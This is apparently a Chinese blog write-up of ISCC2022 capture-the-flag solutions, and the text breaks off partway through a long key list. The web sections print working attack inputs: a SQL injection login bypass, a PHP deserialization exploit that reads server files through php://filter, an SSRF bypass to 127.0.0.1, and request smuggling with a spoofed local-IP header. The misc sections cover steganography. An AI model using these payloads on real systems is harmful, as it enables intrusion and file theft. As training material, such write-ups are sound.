ISCC2022 | 风尘孤狼
0%

ISCC2022

ISCC2022练武题和擂台赛的部分WP

练武题wp

WEB

冬奥会

payload

?Information={"year":"a","items":[0,[],3]}

Easy-SQL

id=0 union TABLE emails limit 7,1

得到源码之后审计

<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
  if ($conn->connect_errno) {
  die("Connection failed: " . $conn->connect_errno);
} 

echo "Where is the database?"."<br>";

echo "try ?id";

function sqlWaf($s)
{
  $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
  if (preg_match($filter,$s))
      return False;
  return True;
}

if (isset($_GET['id'])) 
{
  $id = $_GET['id'];
  $sql = "select * from users where id=$id";
  $safe = preg_match('/select/is', $id);
  if($safe!==0)
      die("No select!");
  $result = mysqli_query($conn, $sql);
  if ($result) 
  {
      $row = mysqli_fetch_array($result);
      echo "<h3>" . $row['username'] . "</h3><br>";
      echo "<h3>" . $row['passwd'] . "</h3>";
  }
  else
      die('<br>Error!');
}


if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

  $username = strval($_POST['username']);
  $passwd = strval($_POST['passwd']);

  if ( !sqlWaf($passwd) )
      die('damn hacker');

  $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
  $result = $conn->query($sql);
  if ($result->num_rows > 0) {
      $row = $result->fetch_assoc();
      if ( $row['username'] === 'admin' && $row['passwd'] )
      {
          if ($row['passwd'] == $passwd)
          {
              die($flag);
          } else {
              die("username or passwd wrong, are you admin?");
          }
      } else {
          die("wrong user");
      }
  } else {
      die("user not exist or wrong passwd");
  }
}
mysqli_close($conn); 
?>

payload

username=1'/**/union/**select/**/1,0x61646d696e,3%23&passwd=3

Pop2022

预期解

exp

<?php
class Road_is_Long{
    public $page;
    public $string;
}

class Try_Work_Hard{
    protected  $var="php://filter/read=convert.base64-encode/resource=index.php";
}

class Make_a_Change{
    public $effort;
}
$road1=new Road_is_Long();
$road2=new Road_is_Long();
$try=new Try_Work_Hard();
$make=new Make_a_Change();



$make->effort=$try;
$road2->string=$make;
$road1->page=$road2;
$ser=serialize($road1);
echo urlencode($ser);
?wish=O%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A{s%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A{s%3A6%3A"%00*%00var"%3Bs%3A62%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fflag"%3B}}}s%3A6%3A"string"%3BN%3B}

非预期解

/flag.php

让我康康!

http请求走私

走私成功,但是显示本地才可以看到,那么添加一下secr3t_ip: 127.0.0.1

ISCC{AWEIweiwwwweeeiii_JJj9JJGg5GGG_NONONONO2022}

这是一道代码审计题

先访问/index,抓包删除login=0,然后修改url/index?url=127.0.0.1,然后得到./static/code.txt,访问得到

👛👜👝🐗👞👜👥👜👊👠👞👥🐟🐠🐱🐁🐗🐗🐗🐗👠👝🐟👚👦👥👫👩👦👣👖👢👜👰🐴🐴🐨🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👩👜👥👛👜👩👖👫👜👤👧👣👘👫👜🐟🐙👠👥👛👜👯🐥👟👫👤👣🐙🐠🐁🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐙👐👦👬🐗👟👘👭👜🐗👥👦👫🐗👘👚👚👜👪👪🐗👫👦🐗👫👟👠👪🐗👧👘👞👜🐘🐙🐁🐁👛👜👝🐗👚👟👜👚👢👖👪👪👩👝🐟👬👩👣🐠🐱🐁🐗🐗🐗🐗👟👦👪👫👥👘👤👜🐗🐴🐗👬👩👣👧👘👩👪👜🐟👬👩👣🐠🐥👟👦👪👫👥👘👤👜🐁🐗🐗🐗🐗👫👩👰🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👥👦👫🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👥👦👫🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐷🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👘👠👪👜🐗🐹👘👪👜🐼👯👚👜👧👫👠👦👥🐟🐙👬👩👣🐗👝👦👩👤👘👫🐗👜👩👩👦👩🐙🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗🐗👩👜🐥👤👘👫👚👟🐟🐞👟👫👫👧👪🐶🐱🐦🐦🐷🐟🐶🐱👒🐤👓👮🐥👔👳🐟🐶🐱🐜👒👓👛👘🐤👝🐸🐤🐽👔👲🐩👴🐠🐠🐢🐞🐣🐗👬👩👣🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👡👬👛👞👜👖👠👧🐟👟👦👪👫👥👘👤👜🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👐👦👬🐗👥👦👫🐗👞👜👫🐗👫👟👜🐗👩👠👞👟👫🐗👚👣👬👜🐘🐙🐁🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👧👖👘👛👛👩👜👪👪🐗🐴🐗👪👦👚👢👜👫🐥👞👜👫👘👛👛👩👠👥👝👦🐟👟👦👪👫👥👘👤👜🐣🐞👟👫👫👧🐞🐠👒🐧👔👒🐫👔👒🐧👔🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👠👪👖👠👥👥👜👩👖👠👧👘👛👛👩👜👪👪🐟👠👧👖👘👛👛👩👜👪👪🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐙👠👥👥👜👩🐗👠👧🐗👘👛👛👩👜👪👪🐗👘👫👫👘👚👢🐙🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👐👦👬🐗👥👦👫🐗👞👜👫🐗👫👟👜🐗👩👠👞👟👫🐗👚👣👬👜🐘🐙🐁🐗🐗🐗🐗👜👯👚👜👧👫🐗🐹👘👪👜🐼👯👚👜👧👫👠👦👥🐗👘👪🐗👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗👪👫👩🐟👜🐠🐁🐗🐗🐗🐗👜👯👚👜👧👫🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐣🐗🐙👬👥👢👥👦👮🐗👜👩👩👦👩🐙🐁🐁👛👜👝🐗👠👧🐩👣👦👥👞🐟👠👧👖👘👛👛👩🐠🐱🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗👪👫👩👬👚👫🐥👬👥👧👘👚👢🐟🐙🐘👃🐙🐣🐗👪👦👚👢👜👫🐥👠👥👜👫👖👘👫👦👥🐟👠👧👖👘👛👛👩🐠🐠👒🐧👔🐁🐁👛👜👝🐗👠👪👖👠👥👥👜👩👖👠👧👘👛👛👩👜👪👪🐟👠👧🐠🐱🐁🐗🐗🐗🐗👠👧🐗🐴🐗👠👧🐩👣👦👥👞🐟👠👧🐠🐁🐗🐗🐗🐗👧👩👠👥👫🐟👠👧🐠🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗👠👧🐩👣👦👥👞🐟🐞🐨🐩🐮🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐧🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐮🐩🐥🐨🐭🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐧🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐧🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐨🐰🐩🐥🐨🐭🐯🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐨🐭🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐨🐭🐗👦👩🐗👠👧🐩👣👦👥👞🐟🐞🐧🐥🐧🐥🐧🐥🐧🐞🐠🐗🐵🐵🐗🐩🐫🐗🐴🐴🐗👠👧🐗🐵🐵🐗🐩🐫🐁🐁👛👜👝🐗👮👘👝🐨🐟👠👧🐠🐱🐁🐗🐗🐗🐗👝👦👩👙👠👛👛👜👥👖👣👠👪👫🐗🐴🐗👒🐗🐞🐥🐞🐣🐗🐞🐧🐞🐣🐗🐞🐨🐞🐣🐗🐞🐩🐞🐣🐗🐞🐮🐞👔🐁🐗🐗🐗🐗👝👦👩🐗👮👦👩👛🐗👠👥🐗👝👦👩👙👠👛👛👜👥👖👣👠👪👫🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👠👧🐗👘👥👛🐗👮👦👩👛🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐗👮👦👩👛🐗👠👥🐗👠👧🐥👣👦👮👜👩🐟🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜🐁🐁👛👜👝🐗👡👬👛👞👜👖👠👧🐟👠👧🐠🐱🐁🐗🐗🐗🐗👠👝🐟👮👘👝🐨🐟👠👧🐠🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👪👣👜🐁🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗👘👛👛👩🐗🐴🐗👘👛👛👩🐥👜👥👚👦👛👜🐟👜👥👚👦👛👠👥👞🐗🐴🐗🐙👬👫👝🐤🐯🐙🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👧👧🐗🐴🐗👙👘👪👜🐭🐫🐥👜👥👚👦👛👜👪👫👩👠👥👞🐟👘👛👛👩🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👧👧🐗🐴🐗👠👧👧🐥👪👫👩👠👧🐟🐠🐥👣👦👮👜👩🐟🐠🐥👛👜👚👦👛👜🐟🐠🐁🐗🐗🐗🐗🐗🐗🐗🐗👠👝🐟👠👧🐴🐴👠👧👧🐠🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👞👣👦👙👘👣🐗👚👦👥👫👩👦👣👖👢👜👰🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👚👦👥👫👩👦👣👖👢👜👰🐗🐴🐗🐨🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗👋👩👬👜🐁🐗🐗🐗🐗🐗🐗🐗🐗👜👣👪👜🐱🐁🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗🐗👩👜👫👬👩👥🐗🐽👘👣👪👜

base100解码得到源码

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"

def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"

def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]

def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24

def waf1(ip):
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False

def judge_ip(ip):
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False

代码审计之后访问?url=http://@MTI3LjAuMC4x,得到一个路径和一个cookie,用cookie访问这个路径,查看html

尝试xxe,得到flag

爱国敬业好青年-2

get/change然后post天安门坐标lati=116°23′E&langti=39°54′N

flag=ISCC{w19qs_10llQBX08vE_a0_1qNO}

findme

查看源码有提示,访问/unser.php

post传参

data=O:1:"a":1:{s:3:"un2";s:49:"php://filter/read=convert.base64-encode/resource=";}
PD9waHANCiRhID0gJ2ZsYWflnKjlvZPliY3nm67lvZXkuIvku6XlrZfmr41m5byA5aS055qEdHh05LitLOaXoOazleeIhuegtOWHuuadpSc7

base64解码得到

<?php
$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';

原生类扫目录

data=O:1:"a":5:{s:3:"un0";s:18:"FilesystemIterator";s:3:"un1";s:9:"glob://f*";s:3:"un2";N;s:3:"un3";s:11:"unserialize";s:3:"un4";N;}

img

扫到```Your output: fA07TE_G19nde_OR1Der5r.txt`,访问得到flag

img

MISC

单板小将苏翊鸣

图片截断了,恢复一下,用010编辑器打开,调整长宽一样,即可恢复图片

image-20220501103202079

得到二维码,扫码得到unicode编码

\u5728\u8fd9\u6b21\u51ac\u5965\u4f1a\u7684\u821e\u53f0\u4e0a\uff0c\u6211\u56fd\u5c0f\u5c06\u82cf\u7fca\u9e23\u65a9\u83b7\u4e00\u91d1\u4e00\u94f6\uff0c\u90a3\u4f60\u77e5\u9053\u6b64\u6b21\u51ac\u5965\u4f1a\u6211\u56fd\u603b\u5171\u83b7\u5f97\u51e0\u679a\u5956\u724c\u5417\uff1f\u53c8\u5206\u522b\u662f\u51e0\u91d1\u51e0\u94f6\u51e0\u94dc\u5462\uff1f

解码得到image-20220501103257825

查询数据得到解压密码

image-20220501103317816

image-20220501103327929

藏在星空中的诗-1

下载附件stars.psd用ps打开,调整图层一不透明度为100%,看到提示

然后打开那个Poem.txt附件,进行排序,得到的就是解压密码,解压那个压缩包之后是表格,对照表格就可以翻译出flag!img

img

img

藏在星空中的诗-2

利用在线工具杂项符号转unicoode字符,一一对照好表即可得到

\u0049\u0053\u0043\u0043\u007B\u0062\u0032\u0039\u0021\u0061\u0031\u0028\u0035\u0028\u004A\u0058\u0045\u0070\u0035\u007D

解码后得到

ISCC{b29!a1(5(JXEp5}

降维打击

得到的图片binwalk扫一下看看,发现可以分离一个

binwalk 1.png
dd if=1.png of=3.jpg skip=290500 bs=1

imgimg

再用zeteg分离得到最后的图片,

zsteg -a 1.png

img

zsteg -e b1,r,lsb,yx 1.png -> 3.png 
得到下面这个

img

对照这个得到flag

ISCC{BRDB-CLHD-JLRN}

真相只有一个

附件stream开头加50 4B,压缩加密包,然后entity.png的lsb中发现一部分密码

img

根据密码制作爆破字典,爆破得到19981111,解压出文件stream.pcapng,流量分析,导出来了一个MP3文件,看一下发现摩斯密码img

../.../-.-./-.-./--/../.../-.-./解码是I S C C M I S C

用snow.exe解密,得到flag

img

ISCC{NSm4-FYDg-F8GI}

2022冬奥会

图片隐写,调整长宽一样,得到html实体编码

img

img

所以解压密码为灯笼,得到文件flag.jpg,文本查看得到flag

ISCC{beij-dahb-1009}

套中套

图片加png文件头,改高得第一部分密码

img

img

第一段密码wELC0m3_

第二部分,lsb十六进制得到T0_tH3

第三部分图片尾部base64解码得到_ISCC_Zo2z

拼接解压密码为wELC0m3_T0_tH3_ISCC_Zo2z

解压后写个脚本

pubKey = ([24711277289455805071082183921144414032582753663573146469690760085918988346282287830925440309641574970837122386670243171683088155559238888879589465620187779156722578866277244839846688585479196, 8331342674634579788187066694536982163316001309813524371617575401438981756213646261714664444979049172993827679059994325931829820406248619183121063046359168137539946177441258548198381042506623, 37703954458339783215182402838858898442104300800502847019310017886763632326958244079374887169631622937188935937560635479222556228345922043876878912006330280400021181064023528428229021383998773, 25945844358709395918619063088903632951477946913663605727390703353781460648598193122979795324054791877587120519204436132166734684859520681257026335668408205578299876294763586571517340099833251, 46617796408457800169802970506008979749949755415344267530184000035045033930599177801417568531348337113951787988075042216831770929779149620046070943604233228701354336451430773154133861987749736, 42327880776629974121037465864835269480416131528553513676712544339274319407214439082635821738006051597102762475984356192961043234567645210948258511362083821220049393631612535119736190230505079, 22589508873462778330480725281334942556920040122718087013134335609054373022750940493907481894041761451500933602254201267626587716133274536950322527863347103390866567700839589023665853744176166, 49012245620167849002831231356902229194157957266486347984277724206214957520359694455291662818602399440527235773250855790121299923414792428085214736131229263074041971520146812818292757283873972, 50505294007387374356187011832999770420942567192611311152519245434155214975329620482872555711095896003177127425845837803400857344978100153324725001556125905437698323475597576788218126161099748, 34414786369900765425214990265206529100837523490988350328499535711172031795804372249788550156161478651816329269889968144030583108248751740619681030774787866493158241605226717696519397656928761, 5502680605412473949454545822542086565207206020304695803386351464931798180745299614793446981159878475871947667524780863633062822368011961917121718991914199133807397897209943082470470090855239, 9983311781614144459946114456331704088107639087097626233450958945692605583507051189547829807304454244438044518594916557943389434148863316112458522629232887473171898243371185747762751823927947, 48595344374998502475371076864600970857905298177970136849177794628315586457194537343102046554336867973271712237460686037428475343416532023474688245581528647040159995621526996436779938514083176, 30454044156600685547012361559528681837862663453766414789613678283059618403587081733150542831360841363729852732400590613716299519010668812729035958444961137248573111009009383052804127453631029, 29262465032576518257676026674076229615092607424499500332652757724283094828286106061934536663326477468236600903584605319876120398091060431915056800709813964618546529513946627290425530263151785, 58185916880654264057610847400993593764760105195559718130914887205667627960557861087272445125027305651241372181116022684217422418467491370778628349874535569764190295247016711254931516685468763, 50921877714800544475632450382663873906375610195117639257647328721148735828096477553253402935403941670891094883705610281862715168903139696245286876582609952598151293850053015830379511213972743, 38666998055817743159315776056038793353694644727484775020315432289017565065508607748180887543997777917674564556433615026286429388346922382550025360849523093169561551332244159493719912059781747, 2618433286435944949991686140343101299794881415225422420328973994756674163460246534976704295474642810788091225332813529196514409401028062132727458892297854618591225064139465121144529214787359, 15480360531471643031574551152063675696371174191802025724204527356937457630739509894172219260947369397642717350574189853163983085630193129264991869792533078518435439873596650874449441676462668, 58602755253467326614029454783001663335922655777271770463533491628284000847218760267942717989253811387794064666939321561082896879847104642223475122351990487064856802357742730475539596891046692, 45168901123765244366991602858072030788922012241759967936935800489295253946084124106950261327937372194753304110979424196891136037000437320540563517970728380740700665590309964696933950533768952, 53095220066787807649094688415293583022426300394279421659984006465439017324791757144036815940148125279160663621726851858919264911024418507573076327932777107133556897824458372268197339351996050, 7678913185720959224047113283074762966863107257800639648979005678996248105320726214014045806477516899572209637951171447194990910321009220926072297492552801113592628268168399993433574593468502, 37959167582142866022915755986516747311215397821143293846538370998334979797451952481900560704924212988331999767036435777857836921012939210300341751727693548094496560256667712513408836716151074, 42545651517052026953249976733757718747130734598590641325774938685131495452170811885054225996530481032917830345573501191848318085310680273722163386097519639838241428199477437118408178621714090, 9610398279793845223820268953510232729434113393447557999421324995891410814235346759722388316420086296823885985383986638804541574127436150632247129329642747382993402273123828606362086318506545, 19744463887853987506188522688256493351113392479139564742274843195446027734615303020507489136276819812156933775184303608853288797112385962842355566409118478523637667689401510327050155689808963, 4979725803451704682802880425760671801962766594838959346702420024010102650906378175453619080006362724140800969629231682256658227953985378988108718052114334610337888358558164563679074179033934, 14668926421930473155760358387668904656497776501581195022959128573164793788948794457559050645601182951043234342754812273237061242925319104145642020731124457228317607584856514851170615444585585, 65460455002095463508301635207629900022172062603490940057644254400602061418400712297851174032682485882152324214175826165198187099415985297071102776139652984105656201824622553650351799670588945, 2661582533837323983338590062273864301520364357326397920797454944448601911987473465460828367531110033944206117854888428975522476433664338677957019186057110810519534270822863250691457027593044, 12779538505968702708943253328588728814163836032044638747479959239567449619129948012323703553074068191861884355252056415586155135230805815334700683270866487727255569344526622102605049252079197, 61850420362081340308749776345287798149061549939713451598686569595944195998479323930424617090021990637343593584275285296073664530610784418964777622558593896220355098893449991046432197436590815, 55625447034346997655074779792845329848809970234865960498575324169373167970644250275659589291416779330651965190925772334134206502201511955295465581204246482599158834755828739181504688410920090, 14904416005293582561987587212996876960447129876275219980351894584893221270898227205432948845449024712153119872936901283208094580739338490281888647967290861290740157152083915985337434978775904, 22124674754977812834516102854378858529050297803781298797684567461794296685433530240042006429346019294626453914904754425265053037676951997297488874191557784738147055187532517864892027545298315, 18846351874932455622296051092933876028586499884893900742644639816966464207437422678519642330669038978839515093500362729871914197160713556726040506000368526650143519884877363746788961859989132, 22621081149159015032567107719504347553695386923914299415914444288427632487375293596913741307338667796227951565057968083909077066212716991784793985426486838103686411659077034844503176126567789, 12841230998641798116266593207198166735649244492468830162894469944312052458513299045512671494847852308192790180827409763300150170518414022443797443862609024112812965192094711713497604266811617, 10120786799092778094362830067718923842287649317231090770753807189327548106271431002352232816195303298621999022897198457071919114192622014766892543765787280919930815665277147113583396384891114, 41058266319171356374485005618004422265584323710442517247462290624711242578501950124337337997903722834505655714173946372357388396919574021230083882069680153932985831403137524643030385483815800, 52123283472128316976708419634197224071433654547106397460579199293819026350322017651507957133210688435669095244293484184128258366381757433420307988730493665490856056537033979057193480998097763, 61517000967319117566171338221047330324581806374237642231312875833519844079258930787946797082344032110584013134544810839209391074579550421215971726155645956597376068740958698177283737732404827, 16226604739632728375919222595116206334428679353666170449035928991694074630451995163679983802354971368824866433579166025208076428816325748310550403150758192348214760885159116096572525662760101, 66426425703890778075927785969483365267871617675478998065442032710527705903907361434181820023570278730664036493302248694491694073172393569278385741463905464555180447947933938943615052818914183, 2947564769556925319605959230538793663161870226300339519130608498491408776005940198508419841645157582994321121394440225564853852393337606976093752663624776361514402935785722131835098911019403, 29816961646282465976871364104247457927102559081322327721155071385836502816923727268294499430672418815779732053170563814985562872882795933257469163203884659053514988942243178662463188473560295, 2713256216439803749984745895883483863952318758610018250131057573305530374971962615309909225198562619133130194827974264753823687992661761964310791098240593066207346880490695957421285463229107, 9906406334259491146060090196683892489547514234204990430106964503003373179888829787258114325914992191404949463656338508958892876160026312166073788573774288884298018374397303417515521550874150, 54078365793471170140706398796482723868912019038932006275612991202898210325420801183085594405855422507784857365409739547446932223618994314666308619625607987065241502787668992018127962676453483, 20425258677566388400912100957010635842875551938090144574742090980338723925871671882983711166825955421780045924200051850032551916322744543801463085092679158306683258681851505253236948766096106, 33816927193695390021414032401370645373989155036526734515033932429919806358294318423819171837921987915043087186128426177099169163296711457158104374953267011983220034856739201608000795916220084, 22569299706678947064255422911862640664856797506312373134548043143421083056014082136976443234929238934530769251439415905536981559503030264419438070337446106897917782723316841612257532657185840, 60906061769168077951867268304990727455655069877679725265746099100443735874434337363253226597928623916492866603740428700253802610974356684244729994359250955321825806491119397784967620301958162, 61683560492394868273238752217563827909261070437626043044351411081967771518960115227142799898401153293711484529338725744416210848469542659309555786764343106036543284325064978872324776912148336, 50356345233672398555575161883902863039608856563116994194514401421843004097316661791434165508110209485393309699728137647946332880092630169453933776956614977163140290579875896856914867943995366, 57501896087761221000564375757697136810592110930362342648371860401388353885180289214991062858384258865103093846911709029759241601933198727412147772047933274371847299271752509256524812106942250, 12737830521940166510518732614385010900798810502108660291643561432683743269526526847655249815296395869028388694217745935835462182303969283228700066381443353698625850151497471530674890948180993, 52730525322722654713921376964199238474033765608452650504653597312254899581487280672905721240683884524603750141189731290600453246408181070974974158931451326099247674578886059184134025793063868, 5832179034817012236650369797643672435211585032058945177743488719550712649689612351275237337336471079142829651870904093420916141481654235729551073585642892827115226656310606860460600288273655, 62535517575239814174667016568701230794852349969893721013796460627994219128629091861568486936466709698436018363828881128925403900911271449183538857896542035146017269134876848846262990161045234, 62674735529087559354407464038166154727326545572349224291590487213027570707946522267599386119190546292564063533831451739927875419572436144686502560587414111351387107075097956297382503773821605, 50231775288091956263035747878014492829481430248806106216294196040661117899719475382706042952817219810195452729807556678800903374695753170238793075426601197698713622896760402323336733722892457, 66016703624038041271066616941982890762300212198964544029720194993794639127975468101951537864014124274077320069820145004837891079794854747265683579064037448180401326235378152083537351893156223, 2496511842088422406097481800700154417846766004058284282880930570445186794868220752320999581794041120993227584166556524200479566958726138416756301263459458317338037665782200880712313529579524, 52646872632807334416860779432858640539375423228734617646469622709212835705722292347344358678684546207133845232106873627106705739596352075500857832725750858846569694186453572113172665960017652, 39646370252597198496565236102395427848407572580777108324794151271108081384633913864988168655760133387616118209994149416248124886441795495337768092942063220264859382839551951956893925922412134, 66763103206507486137915061914140088421709328069132507765797646700896492046866661406014319733770194930344476690676065063551966262168442474623889019282388949237941611205500498651223291756556086, 30905411916496490647412235950903360870799765548925132745231965669523205205526281555385893805493026281813975250361982091674522643825764888431268279695491360788418367996590337791641197136530928, 36802978383179633045602430175109758511698299036619412838234669610566632506407215718193693455593330403355905832136364706436478063342628406408423151803944813143750407470940914920265832395392001, 60194749394567132016931527223219221042651662116186510587392574598776808636622825172727654207485891941119029919178746441914434963823676756278931330235015964449860965967208494559221500283783040, 23357944960436444392734443389914040506104019640222393290351361988571689390092415558252707718277689369116844128476481036173738922358780605908966379866637105124707173167456714851636013548156739, 14413839339813812319199177166631152261901064711697106835523633830127181361479752535713717720721786075848232234737506977642328333152855488589275858257180278117734620887231016551096332909708647, 63623661091573663419092333077483294513125186988059499936797498945468023816545390708028673599803856000968509633239781485507821105927858868446051126441796952476590488222951683516934788195889963, 47173449672743681102493035677250432660900249391635411883186020982453858441259109812035644083109944719089237624902661190762915664778776463391384519521965033263461250935422119735050908678746124, 23898959454761699951321644342304976175952138299965456468728190477778225149676091931661794316036592189799061007664186888208998219451627854766298682041388770663736583846033670421901199977051411, 56939465507988310684111686507506864403334446260627101558693334520107599582228641195271877482759620303590720056336457467988941316333304541105000907921837480484760039333140714011944997919780636, 57706995827795099322874578236777361637931874707512085328096497850678167529225293754831192001359772520324244402768868076922243301593839657238176101913755401558771628533307197747939433327739357, 59085290173525715274883679181022755626358508525268408133006681403578109907823591218117894685916748218664618156600085708664767942527566222387600125996268497328797162074351708067688299291381563, 40724438992892642016068593942376539944990640030896442125862163295959034803198543039444007102414294992187153524879384818314714965874051460224743541457322201510121319241395627910136543236765269, 9885341381437913020797374114635635157797978318582858745976562761293377897211673386882866982483379152013393705353804659045661846206847102990751829482196178225485544173780798512708262635703137, 42002669955588701846417038940446418629043958073383584745602327041218973407801520482502048385068132376226181082957198557183099735613370398617648713379368136173014433947040712584842132565864809, 25125663990409955127958261559236512499160636662164598599968685249425762965432303284595504718678127834797999144615563347280922038639955929277491432423108198416295109177311644956378899286345151, 52043232111994440152170692751454337323710074655550707818713027507474996117332369275747048022256132519888015600476206150533420139611662074182758887314859751780004242390813999427167134873641489, 21164222904289898583200820230475470937832140078018589456006171221104992588029054270268844445513562633190468248317703743737856297960575866226387062814079680174853254778194574592880561679849321, 15702484615088500815369257827128964783741741236771912266664290661364568194649397469203268785140713546356732952569078861591717555292723304000727339554606906925957856479912345844412702333471365, 10865661251463028269594251527245143343667168817630466243933504255371484048555805440670555614154552108640243768578016581085840046572631906358622366070304538652262695752078134210026057585627918, 2848803623223996890657483211411398077478034985158329263137805600265521902541279192423825859542373133279622786546289736320500383625468714866606412997145169115584444614405591903631064849794838, 43064052364850657153799843048226216904413929532819108475573315194785770905238536117687580944885663773490036328092028409381170318943961988990509994701842228728111323362261400085835856335640347, 63990489176463655630916454653915259090817137481628354169177456232363892666174474468571272039198941019634065551588057378319563646786876536038530167422740816457574069025123874247946420378990978, 20536210103644890440196110659064359071736314904570034779280012207392765984806670293915911314747448059549956521041198910598380251418835027301696553899752401455805786429802889562461551573414835, 48688018205736289829437263548318254081521429916953442860256279463165884722368083232628566478243179223565846730779664230689398112194883125689324606238190271377157029330565187921034701085881412, 